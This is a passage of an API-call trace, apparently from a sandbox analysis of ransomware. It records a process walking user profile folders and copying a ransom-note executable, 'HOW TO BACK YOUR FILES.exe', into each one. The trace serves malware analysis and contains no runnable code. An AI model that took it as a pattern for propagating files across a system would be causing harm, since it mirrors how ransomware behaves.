ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.673] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0065.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0065.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.674] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned 81 [0065.674] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0065.674] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.674] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.674] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.674] GetLastError () returned 0x0 [0065.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.674] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.674] CloseHandle (hObject=0x120) returned 1 [0065.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.675] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.675] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.675] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.675] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0065.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0065.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.675] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned 75 [0065.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0065.675] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.675] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.675] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.676] GetLastError () returned 0x0 [0065.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.676] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.676] CloseHandle (hObject=0x120) returned 1 [0065.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.676] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.676] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.676] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.676] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.676] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb3c8 | out: hHeap=0x2b0000) returned 1 [0065.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.676] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 84 [0065.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.677] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.677] GetLastError () returned 0x0 [0065.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.677] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.677] CloseHandle (hObject=0x120) returned 1 [0065.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.677] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.677] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.677] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.677] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.678] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 84 [0065.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.678] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.678] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.678] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.678] GetLastError () returned 0x0 [0065.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.678] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.678] CloseHandle (hObject=0x120) returned 1 [0065.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.679] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.679] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.679] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5f98 | out: hHeap=0x2b0000) returned 1 [0065.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.679] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 84 [0065.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.679] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.679] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.679] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.680] GetLastError () returned 0x0 [0065.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.680] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.680] CloseHandle (hObject=0x120) returned 1 [0065.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.680] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.680] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.680] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.680] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.680] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 84 [0065.680] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.680] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.680] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.681] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.681] GetLastError () returned 0x0 [0065.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.681] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.681] CloseHandle (hObject=0x120) returned 1 [0065.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.681] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.681] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.681] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.681] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.682] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" [0065.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0065.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.682] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned 69 [0065.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" [0065.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.682] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.682] GetLastError () returned 0x0 [0065.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.682] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.683] CloseHandle (hObject=0x120) returned 1 [0065.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.683] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.683] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.683] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.683] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0065.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.683] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 109 [0065.683] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.683] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.683] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.684] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.684] GetLastError () returned 0x0 [0065.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.684] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.684] CloseHandle (hObject=0x120) returned 1 [0065.684] HeapFree (in: 